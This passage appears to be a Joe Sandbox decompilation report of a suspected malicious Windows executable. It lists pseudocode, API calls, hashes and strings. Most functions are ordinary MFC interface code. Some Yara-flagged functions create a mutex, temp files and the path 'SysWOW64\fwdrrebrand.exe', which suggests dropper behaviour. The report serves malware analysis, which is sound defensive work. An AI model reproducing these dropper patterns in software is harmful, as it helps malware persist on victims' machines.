				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t136;
				intOrPtr _t151;
				signed int _t153;
				intOrPtr _t154;
				intOrPtr _t157;
				intOrPtr _t158;
				signed int _t163;

				_t151 = __edx;
				_t130 = __ecx;
				_t161 = _t163;
				_t71 =  *0x463404; // 0x18eab29f
				_v8 = _t71 ^ _t163;
				_t157 = _a4;
				_t128 = __ecx;
				_t153 = 0;
				_v276 = _t157;
				_v272 = _a8;
				_t167 = __ecx;
				if(__ecx == 0) {
					L2:
					E00406436(_t128, _t130, _t153, _t157, _t167);
				}
				if(_t157 == _t153) {
					goto L2;
				}
				_t76 = GetWindowRect( *(_t157 + 0x20),  &_v316);
				if( *((intOrPtr*)(_t157 + 0x90)) != _t128 || _v272 != _t153 && EqualRect( &_v316, _v272) == 0) {
					if( *((intOrPtr*)(_t128 + 0x98)) != _t153 && ( *(_t157 + 0x88) & 0x00000040) != 0) {
						 *(_t128 + 0x84) =  *(_t128 + 0x84) | 0x00000040;
					}
					 *(_t128 + 0x84) =  *(_t128 + 0x84) & 0xfffffff9;
					_t79 =  *(_t157 + 0x84) & 0x00000006 |  *(_t128 + 0x84);
					 *(_t128 + 0x84) = _t79;
					_t175 = _t79 & 0x00000040;
					if((_t79 & 0x00000040) == 0) {
						_push(0x104);
						_push( &_v268);
						E00412D87(_t128, _t157, _t151, _t153, _t157, _t175); // executed
						E0041FC5A(_t157, _t151,  *((intOrPtr*)(_t128 + 0x20)),  &_v268); // executed
					}
					_t84 = ( *(_t157 + 0x84) ^  *(_t128 + 0x84)) & 0x0000f000 ^  *(_t157 + 0x84) | 0x00000f00;
					if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
						_t85 = _t84 & 0xfffffffe;
						__eflags = _t84 & 0xfffffffe;
					} else {
						_t85 = _t84 | 0x00000001;
					}
					E00420D66(_t157, _t85);
					_v296 = _t153;
					if( *((intOrPtr*)(_t157 + 0x90)) != _t128 && IsWindowVisible( *(_t157 + 0x20)) != 0) {
						E00412D05(_t157, _t153, _t153, _t153, _t153, _t153, 0x97);
						_v296 = 1;
					}
					_v300 = _v300 | 0xffffffff;
					if(_v272 == _t153) {
						E004133A2(_t128 + 0x9c, _t157);
						E004133A2(_t128 + 0x9c, _t153);
						_t89 =  *0x466524; // 0x2
						_t91 =  *0x466520; // 0x2
						_t135 = _t157;
						E00412D05(_t157, _t153,  ~_t91,  ~_t89, _t153, _t153, 0x115);
					} else {
						E00413342( &_v292, _v272);
						E00422BFB(_t128,  &_v292);
						asm("cdq");
						asm("cdq");
						_push((_v280 - _v288 - _t151 >> 1) + _v288);
						_push((_v284 - _v292 - _t151 >> 1) + _v292);
						_push(_v276);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t114 = E0041365C(_t128);
						_t135 = _v276;
						_v300 = _t114;
						E00412D05(_v276, 0, _v292, _v288, _v284 - _v292, _v280 - _v288, 0x114);
						_t157 = _v276;
						_t153 = 0;
					}
					if(E0040EE3C(_t128, _t135, GetParent( *(_t157 + 0x20))) != _t128) {
						E004133D6(_t157, _t128);
					}
					_t136 =  *((intOrPtr*)(_t157 + 0x90));
					if(_t136 != _t128) {
						__eflags = _t136 - _t153;
						if(_t136 != _t153) {
							__eflags =  *((intOrPtr*)(_t128 + 0x98)) - _t153;
							if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
								L29:
								_t99 = 0;
								__eflags = 0;
							} else {
								__eflags =  *((intOrPtr*)(_t136 + 0x98)) - _t153;
								if( *((intOrPtr*)(_t136 + 0x98)) != _t153) {
									goto L29;
								} else {
									_t99 = 1;
								}
							}
							_push(_t99);
							_push(0xffffffff);
							goto L31;
						}
					} else {
						_push(_t153);
						_push(_v300);
						L31:
						_push(_t157);
						E00413A2C(_t136, _t153);
					}
					 *((intOrPtr*)(_t157 + 0x90)) = _t128;
					if(_v296 != _t153) {
						E00412D05(_t157, _t153, _t153, _t153, _t153, _t153, 0x57);
					}
					E004139C3(_t128, _t128, _t157);
					 *(E00408487(_t128) + 0xe4) =  *(_t76 + 0xe4) | 0x0000000c;
				}
				_pop(_t154);
				_pop(_t158);
				_pop(_t129);
				return E00430650(_t76, _t129, _v8 ^ _t161, _t151, _t154, _t158);
			}


































                  0x00414166
                  0x00414166
                  0x00414169
                  0x00414171
                  0x00414178
                  0x00414180
                  0x00414184
                  0x00414186
                  0x00414188
                  0x0041418e
                  0x00414194
                  0x00414196
                  0x00414198
                  0x00414198
                  0x00414198
                  0x0041419f
                  0x00000000
                  0x00000000
                  0x004141ab
                  0x004141b7
                  0x004141e6
                  0x004141f1
                  0x004141f1
                  0x004141f8
                  0x0041420e
                  0x00414210
                  0x00414216
                  0x00414218
                  0x0041421a
                  0x00414225
                  0x00414228
                  0x00414237
                  0x00414237
                  0x00414253
                  0x0041425e
                  0x00414265
                  0x00414265
                  0x00414260
                  0x00414260
                  0x00414260
                  0x0041426b
                  0x00414270
                  0x0041427c
                  0x00414297
                  0x0041429c
                  0x0041429c
                  0x004142a6
                  0x004142b3
                  0x00414375
                  0x00414381
                  0x00414386
                  0x00414395
                  0x0041439e
                  0x004143a0
                  0x004142b9
                  0x004142c5
                  0x004142d3
                  0x004142ea
                  0x00414303
                  0x0041430e
                  0x0041430f
                  0x00414315
                  0x0041431b
                  0x0041431c
                  0x0041431d
                  0x00414320
                  0x00414321
                  0x00414326
                  0x0041432c
                  0x0041435f
                  0x00414364
                  0x0041436a
                  0x0041436a
                  0x004143b6
                  0x004143bb
                  0x004143bb
                  0x004143c0
                  0x004143c8
                  0x004143d3
                  0x004143d5
                  0x004143d7
                  0x004143dd
                  0x004143ec
                  0x004143ec
                  0x004143ec
                  0x004143df
                  0x004143df
                  0x004143e5
                  0x00000000
                  0x004143e7
                  0x004143e9
                  0x004143e9
                  0x004143e5
                  0x004143ee
                  0x004143ef
                  0x00000000
                  0x004143ef
                  0x004143ca
                  0x004143ca
                  0x004143cb
                  0x004143f1
                  0x004143f1
                  0x004143f2
                  0x004143f2
                  0x004143f7
                  0x00414403
                  0x0041440e
                  0x0041440e
                  0x00414416
                  0x00414422
                  0x00414422
                  0x0041442c
                  0x0041442d
                  0x00414430
                  0x00414437

                  APIs
                  • GetWindowRect.USER32 ref: 004141AB
                  • EqualRect.USER32 ref: 004141D2
                  • IsWindowVisible.USER32(?), ref: 00414281
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 0041365C: GetWindowRect.USER32 ref: 004136C8
                    • Part of subcall function 00412D05: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,0040E9F3,?,?,0040E9F3,00000000,?,?,000000FF,000000FF,00000015), ref: 00412D2D
                  • GetParent.USER32(?), ref: 004143A8
                    • Part of subcall function 004133D6: SetParent.USER32(?,?,?,004143C0,?,00000000), ref: 004133E9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Rect$Parent$EqualException@8H_prolog3ThrowVisible
                  • String ID: @
                  • API String ID: 2897153062-2766056989
                  • Opcode ID: 51da40c84404c78246d96a9ebf4bc883016bb9fe2410d1c0c45aae66030a84c8
                  • Instruction ID: f72a821154006f18434582f8d291f052a883131ce462ce5628eead07db9ff8ab
                  • Opcode Fuzzy Hash: 51da40c84404c78246d96a9ebf4bc883016bb9fe2410d1c0c45aae66030a84c8
                  • Instruction Fuzzy Hash: B771B331A005189FCB25DF25DC82BEAB7B9BF89304F0041AEE959E6191DB745EC18F18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00414CC5, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 43COMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E00414CC5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t20;
				intOrPtr _t26;
				void* _t33;
				void* _t34;

				_push(4);
				E00431A9B(E0044B279, __ebx, __edi, __esi);
				_t33 = __ecx;
				 *((intOrPtr*)(_t34 - 0x10)) = 0;
				E00414C61(__ecx, 0x20, _t34 - 0x10);
				if( *((intOrPtr*)(_t34 + 8)) != 0) {
					_t37 =  *((intOrPtr*)(_t34 - 0x10));
					if( *((intOrPtr*)(_t34 - 0x10)) == 0) {
						_t26 = E00404461(_t37, 0x20);
						 *((intOrPtr*)(_t34 - 0x10)) = _t26;
						 *(_t34 - 4) = 0;
						_t38 = _t26;
						if(_t26 == 0) {
							_t20 = 0;
							__eflags = 0;
						} else {
							_push(0x1e);
							_push( *((intOrPtr*)(_t34 + 8)));
							_push("File%d");
							_push("Recent File List");
							_push(0);
							_t20 = E00426DDD(__ebx, _t26, __edx, 0, _t33, _t38);
						}
						 *(_t34 - 4) =  *(_t34 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t33 + 0x88)) = _t20;
						 *((intOrPtr*)( *_t20 + 0x10))();
					}
				}
				_t17 = E00426574(_t33, "Settings", "PreviewPages", 0); // executed
				 *((intOrPtr*)(_t33 + 0x94)) = _t17;
				return E00431B73(_t17);
			}








                  0x00414cc5
                  0x00414ccc
                  0x00414cd1
                  0x00414cdb
                  0x00414cde
                  0x00414ce6
                  0x00414ce8
                  0x00414ceb
                  0x00414cf5
                  0x00414cf7
                  0x00414cfa
                  0x00414cfd
                  0x00414cff
                  0x00414d18
                  0x00414d18
                  0x00414d01
                  0x00414d01
                  0x00414d03
                  0x00414d06
                  0x00414d0b
                  0x00414d10
                  0x00414d11
                  0x00414d11
                  0x00414d1a
                  0x00414d1e
                  0x00414d28
                  0x00414d28
                  0x00414ceb
                  0x00414d38
                  0x00414d3d
                  0x00414d48

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00414CCC
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                    • Part of subcall function 00426DDD: __EH_prolog3.LIBCMT ref: 00426DE4
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$_malloc
                  • String ID: File%d$PreviewPages$Recent File List$Settings
                  • API String ID: 1683881009-526586445
                  • Opcode ID: defe5883bab1cd2dd2f943370091bc3ab319ea14d251a2d82829bc4171220619
                  • Instruction ID: 8481b4ebb2348d884e7cf6e9b90d4b3e2943030dba93614afa04e91a5076872d
                  • Opcode Fuzzy Hash: defe5883bab1cd2dd2f943370091bc3ab319ea14d251a2d82829bc4171220619
                  • Instruction Fuzzy Hash: 0901D430E40314ABCF16EFB19846BAF76A0ABC4B01F20451FF5159B2D2DBB84981974D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041FC5A, Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 76%
                  			E0041FC5A(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				int _t16;
				struct HWND__* _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr _t27;
				void* _t28;
				int _t29;
				intOrPtr _t30;
				CHAR* _t32;
				intOrPtr _t33;
				signed int _t37;

				_t27 = __edx;
				_t24 = __ecx;
				_t35 = _t37;
				_t9 =  *0x463404; // 0x18eab29f
				_v8 = _t9 ^ _t37;
				_t22 = _a4;
				_t32 = _a8;
				_push(_t28);
				_t41 = _t22;
				if(_t22 == 0) {
					L2:
					E00406436(_t22, _t24, _t28, _t32, _t41);
				}
				if(_t32 == 0) {
					goto L2;
				}
				_t29 = lstrlenA(_t32);
				_v264 = 0;
				E00431160(_t29,  &_v263, 0, 0xff);
				if(_t29 > 0x100 || GetWindowTextA(_t22,  &_v264, 0x100) != _t29) {
					L7:
					_t16 = SetWindowTextA(_t22, _t32);
				} else {
					_t16 = lstrcmpA( &_v264, _t32); // executed
					if(_t16 != 0) {
						goto L7;
					}
				}
				_pop(_t30);
				_pop(_t33);
				_pop(_t23);
				return E00430650(_t16, _t23, _v8 ^ _t35, _t27, _t30, _t33);
			}






















                  0x0041fc5a
                  0x0041fc5a
                  0x0041fc5d
                  0x0041fc65
                  0x0041fc6c
                  0x0041fc70
                  0x0041fc74
                  0x0041fc77
                  0x0041fc78
                  0x0041fc7a
                  0x0041fc7c
                  0x0041fc7c
                  0x0041fc7c
                  0x0041fc83
                  0x00000000
                  0x00000000
                  0x0041fc91
                  0x0041fc9c
                  0x0041fca3
                  0x0041fcb2
                  0x0041fcd9
                  0x0041fcdb
                  0x0041fcc7
                  0x0041fccf
                  0x0041fcd7
                  0x00000000
                  0x00000000
                  0x0041fcd7
                  0x0041fce4
                  0x0041fce5
                  0x0041fce8
                  0x0041fcef

                  APIs
                  • lstrlenA.KERNEL32(0040539B,?,00000204), ref: 0041FC86
                  • _memset.LIBCMT ref: 0041FCA3
                  • GetWindowTextA.USER32 ref: 0041FCBD
                  • lstrcmpA.KERNEL32(00000000,0040539B,?,00000204), ref: 0041FCCF
                  • SetWindowTextA.USER32(?,0040539B), ref: 0041FCDB
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                  • String ID:
                  • API String ID: 4273134663-0
                  • Opcode ID: f9e786dce0f22551689d7a2192799aad719d627e5046027f7c7b4cb0d049690b
                  • Instruction ID: 524bb6e1b8b0e51b663d6798a7e8f58f098cd5426cf83612b6fa717cd64371da
                  • Opcode Fuzzy Hash: f9e786dce0f22551689d7a2192799aad719d627e5046027f7c7b4cb0d049690b
                  • Instruction Fuzzy Hash: EF01087660021867DB10AF659D84BDF776CFB59700F000076F906D3241EA74C9859BE8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023EA9FC, Relevance: 7.5, APIs: 5, Instructions: 40synchronizationCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 023EA8F0: CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 023EA930
                  • WaitForSingleObject.KERNEL32(00000000,?,00000000,023EAC6C), ref: 023EAA10
                  • SignalObjectAndWait.KERNEL32(000000FF,00000000,?,00000000,023EAC6C), ref: 023EAA44
                  • ResetEvent.KERNEL32(?,00000000,023EAC6C), ref: 023EAA58
                  • ReleaseMutex.KERNEL32(?,00000000,023EAC6C), ref: 023EAA66
                  • CloseHandle.KERNEL32(?,00000000,023EAC6C), ref: 023EAA72
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: MutexObjectWait$CloseCreateEventHandleReleaseResetSignalSingle
                  • String ID:
                  • API String ID: 3891338068-0
                  • Opcode ID: ae9580c8c28b8d2ac3cc7796078a4458566b1f8218bcb591cbeaebd4088900c0
                  • Instruction ID: e86dc0ce7d429cbb3d239ead1186f3e4ef6ed948f9f840a8c33cacda573c265c
                  • Opcode Fuzzy Hash: ae9580c8c28b8d2ac3cc7796078a4458566b1f8218bcb591cbeaebd4088900c0
                  • Instruction Fuzzy Hash: B9F0A975A802259ADFA51729BD049163A7EEB80391F154422FA46D00E5EB21CC288E50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00448692, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00448692(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t50;
				void* _t54;
				intOrPtr _t57;
				intOrPtr* _t59;
				intOrPtr* _t63;
				void* _t76;
				void* _t77;
				intOrPtr* _t80;
				char* _t81;
				char _t84;
				intOrPtr* _t87;
				intOrPtr* _t118;
				intOrPtr* _t123;
				void* _t124;
				void* _t125;

				_push(0x54);
				E00431B04(E0044CC2A, __ebx, __edi, __esi);
				_t84 =  *((intOrPtr*)(_t124 + 8));
				_t123 = __ecx;
				if(_t84 != 0xffffffff) {
					_t87 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x24))));
					_t118 = 0;
					__eflags = _t87;
					if(_t87 == 0) {
						L7:
						_t50 =  *((intOrPtr*)(_t123 + 0x4c));
						__eflags = _t50 - _t118;
						if(_t50 != _t118) {
							__eflags =  *((intOrPtr*)(_t123 + 0x3c)) - _t118;
							if(__eflags != 0) {
								 *((char*)(_t124 - 0x30)) = _t84;
								E00448494(_t84, _t124 - 0x2c, _t109, 8, _t118);
								 *((intOrPtr*)(_t124 - 4)) = _t118;
								_t54 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x48));
								_t57 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x50));
								_t118 =  *((intOrPtr*)(_t124 - 0x18)) + _t54;
								_push(_t124 - 0x38);
								_t84 = _t123 + 0x44;
								while(1) {
									_t113 = _t124 - 0x30;
									 *((intOrPtr*)(_t124 - 0x34)) = _t57;
									_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x3c)))) + 0x14))(_t84, _t124 - 0x30, _t124 - 0x2f, _t124 - 0x3c, _t57, _t118);
									__eflags = _t59;
									if(_t59 < 0) {
										break;
									}
									__eflags = _t59 - 1;
									if(_t59 > 1) {
										__eflags = _t59 - 3;
										if(__eflags != 0) {
											goto L25;
										} else {
											_t63 = E00447F97(__eflags,  *((intOrPtr*)(_t124 - 0x30)),  *((intOrPtr*)(_t123 + 0x4c)));
											__eflags = _t63;
											if(_t63 != 0) {
												goto L27;
											} else {
												goto L25;
											}
										}
									} else {
										_t118 =  *((intOrPtr*)(_t124 - 0x38)) - E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x58));
										__eflags = _t118;
										if(_t118 == 0) {
											L16:
											_t67 = _t124 - 0x30;
											 *((char*)(_t123 + 0x41)) = 1;
											__eflags =  *((intOrPtr*)(_t124 - 0x3c)) - _t124 - 0x30;
											if( *((intOrPtr*)(_t124 - 0x3c)) != _t124 - 0x30) {
												L27:
												_t123 =  *((intOrPtr*)(_t124 + 8));
											} else {
												__eflags = _t118;
												if(_t118 > 0) {
													L20:
													 *((intOrPtr*)(_t124 - 0x40)) = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x48));
													_t57 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x50));
													_push(_t124 - 0x38);
													_t118 =  *((intOrPtr*)(_t124 - 0x18)) +  *((intOrPtr*)(_t124 - 0x40));
													__eflags = _t118;
													continue;
												} else {
													__eflags =  *((intOrPtr*)(_t124 - 0x18)) - 0x20;
													if( *((intOrPtr*)(_t124 - 0x18)) >= 0x20) {
														goto L25;
													} else {
														E00448268(_t67, _t124 - 0x2c, _t113, _t123, 8, 0);
														goto L20;
													}
												}
											}
										} else {
											_t76 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x60));
											_push( *((intOrPtr*)(_t123 + 0x4c)));
											_push(_t118);
											_push(1);
											_push(_t76);
											_t77 = E00449E18(_t84, _t113, _t118, _t123, __eflags);
											_t125 = _t125 + 0x10;
											__eflags = _t118 - _t77;
											if(_t118 != _t77) {
												L25:
												__eflags = _t123;
											} else {
												goto L16;
											}
										}
									}
									E00402090(_t124 - 0x2c, _t124, 1, 0);
									goto L2;
								}
								goto L25;
							} else {
								_t50 = E00447F97(__eflags, _t84, _t50); // executed
								__eflags = _t50;
								if(_t50 == 0) {
									goto L8;
								} else {
									goto L6;
								}
							}
						} else {
							L8:
						}
					} else {
						_t80 =  *((intOrPtr*)(__ecx + 0x34));
						_t109 =  *_t80 + _t87;
						__eflags = _t87 -  *_t80 + _t87;
						if(_t87 >=  *_t80 + _t87) {
							goto L7;
						} else {
							 *_t80 =  *_t80 - 1;
							__eflags =  *_t80;
							_t123 =  *((intOrPtr*)(__ecx + 0x24));
							_t81 =  *_t123;
							 *_t123 = _t81 + 1;
							 *_t81 = _t84;
							L6:
						}
					}
				} else {
				}
				L2:
				return E00431B87(_t84, _t118, _t123);
			}


















                  0x00448692
                  0x00448699
                  0x0044869e
                  0x004486a1
                  0x004486a6
                  0x004486b5
                  0x004486b7
                  0x004486b9
                  0x004486bb
                  0x004486da
                  0x004486da
                  0x004486dd
                  0x004486df
                  0x004486e6
                  0x004486e9
                  0x00448700
                  0x00448703
                  0x0044870f
                  0x00448719
                  0x00448731
                  0x00448739
                  0x0044873b
                  0x0044873c
                  0x004487ec
                  0x004487f9
                  0x004487fd
                  0x00448803
                  0x00448806
                  0x00448808
                  0x00000000
                  0x00000000
                  0x00448744
                  0x00448747
                  0x00448810
                  0x00448813
                  0x00000000
                  0x00448815
                  0x0044881b
                  0x00448822
                  0x00448824
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00448824
                  0x0044874d
                  0x00448763
                  0x00448763
                  0x00448765
                  0x00448791
                  0x00448791
                  0x00448794
                  0x00448798
                  0x0044879b
                  0x0044883c
                  0x0044883c
                  0x004487a1
                  0x004487a1
                  0x004487a3
                  0x004487b7
                  0x004487cd
                  0x004487de
                  0x004487e6
                  0x004487ea
                  0x004487ea
                  0x00000000
                  0x004487a5
                  0x004487a5
                  0x004487a9
                  0x00000000
                  0x004487ab
                  0x004487b2
                  0x00000000
                  0x004487b2
                  0x004487a9
                  0x004487a3
                  0x00448767
                  0x00448775
                  0x0044877a
                  0x0044877d
                  0x0044877e
                  0x00448780
                  0x00448781
                  0x00448786
                  0x00448789
                  0x0044878b
                  0x00448826
                  0x00448826
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0044878b
                  0x00448765
                  0x00448830
                  0x00000000
                  0x00448835
                  0x00000000
                  0x004486eb
                  0x004486ed
                  0x004486f4
                  0x004486f6
                  0x00000000
                  0x004486f8
                  0x00000000
                  0x004486f8
                  0x004486f6
                  0x004486e1
                  0x004486e1
                  0x004486e1
                  0x004486bd
                  0x004486bd
                  0x004486c2
                  0x004486c4
                  0x004486c6
                  0x00000000
                  0x004486c8
                  0x004486c8
                  0x004486c8
                  0x004486ca
                  0x004486cd
                  0x004486d2
                  0x004486d4
                  0x004486d6
                  0x004486d6
                  0x004486c6
                  0x004486a8
                  0x004486a8
                  0x004486aa
                  0x004486af

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Fputc$H_prolog3_
                  • String ID:
                  • API String ID: 2569218679-3916222277
                  • Opcode ID: 237c212654eced7c93fdea10f5d81e29309294a7abb01743d3939285b13505b4
                  • Instruction ID: 43a9223603d8fbf2c2dcb423a63fa1aa8cc96a8be0706671927d04f470b5847f
                  • Opcode Fuzzy Hash: 237c212654eced7c93fdea10f5d81e29309294a7abb01743d3939285b13505b4
                  • Instruction Fuzzy Hash: 9251F532D046049FEF14EBA5CC819EEB3B6AF48314F24451FE102A7281EF38A805CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023ED35F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 023E1000: GetFileAttributesW.KERNELBASE(?), ref: 023E1047
                    • Part of subcall function 023E1000: CreateDirectoryW.KERNEL32(?,00000000), ref: 023E105A
                    • Part of subcall function 023E1000: GetLastError.KERNEL32 ref: 023E1064
                  • GetTempPathW.KERNEL32(00000104,?,?,C:\Windows\SysWOW64\fwdrrebrand.exe), ref: 023ED3A1
                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?,?,C:\Windows\SysWOW64\fwdrrebrand.exe), ref: 023ED3B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileTemp$AttributesCreateDirectoryErrorLastNamePath
                  • String ID: C:\Users\user\Desktop\yf4df4w2cr.exe$C:\Windows\SysWOW64\fwdrrebrand.exe
                  • API String ID: 3625196337-615456372
                  • Opcode ID: bc16ddc5e52cc6be53a676ee7cbe65da4a768f3512149bc2328157be52433fed
                  • Instruction ID: bec1b44bf77e1e0ee6a5f69b01cd1bc95f3856a491f3cfbd86b1028e5885fb29
                  • Opcode Fuzzy Hash: bc16ddc5e52cc6be53a676ee7cbe65da4a768f3512149bc2328157be52433fed
                  • Instruction Fuzzy Hash: 78018F21F0033857DF7066649C84AEFB26E9B90751F000665EE8BA72D5EE30DD4E8BD0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E1000, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                  Download Yara Rule
                  APIs
                  • GetFileAttributesW.KERNELBASE(?), ref: 023E1047
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 023E105A
                  • GetLastError.KERNEL32 ref: 023E1064
                  Strings
                  • C:\Windows\SysWOW64\fwdrrebrand.exe, xrefs: 023E101B
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesCreateDirectoryErrorFileLast
                  • String ID: C:\Windows\SysWOW64\fwdrrebrand.exe
                  • API String ID: 674977465-640560957
                  • Opcode ID: 297d63e0ead877068241c475d9ae61f41ca9b26d202a7d1a0010b1a616262839
                  • Instruction ID: fd1e93011f822bcc8283b5d0071a39850245a480dbc759047aeb3e8db7fd1ebf
                  • Opcode Fuzzy Hash: 297d63e0ead877068241c475d9ae61f41ca9b26d202a7d1a0010b1a616262839
                  • Instruction Fuzzy Hash: A201DB6184036486EFB0A668A80C6A773ACDF40324F400E65DDFFF24D1EB709D99CA91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004016F0, Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                  Download Yara Rule
                  C-Code - Quality: 76%
                  			E004016F0(void* __ecx, void* __edx, void* __ebp) {
				int _v8;
				char _v12;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _v48;
				intOrPtr _v60;
				void* _v64;
				char _v80;
				char _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t26;
				intOrPtr* _t31;
				intOrPtr* _t32;
				intOrPtr* _t34;
				intOrPtr _t35;
				intOrPtr* _t36;
				intOrPtr* _t42;
				long _t52;
				signed int _t54;
				signed int _t55;
				void* _t81;
				intOrPtr* _t86;
				void* _t91;
				void* _t96;
				signed int _t97;
				void* _t98;

				_t81 = __edx;
				_push(0xffffffff);
				_push(E0044A85C);
				_push( *[fs:0x0]);
				_t97 = _t96 - 0x2c;
				_push(_t54);
				_t26 =  *0x463404; // 0x18eab29f
				_push(_t26 ^ _t97);
				 *[fs:0x0] =  &_v12;
				_t91 = __ecx;
				_t85 = GetVersion;
				if(GetVersion() >= 0) {
					L4:
					E00414CC5(_t54, _t91, _t81, _t85, _t91, __eflags, 4); // executed
					_t31 = E00404461(__eflags, 0x90);
					_t98 = _t97 + 4;
					_v60 = _t31;
					_v8 = 0;
					__eflags = _t31;
					if(__eflags == 0) {
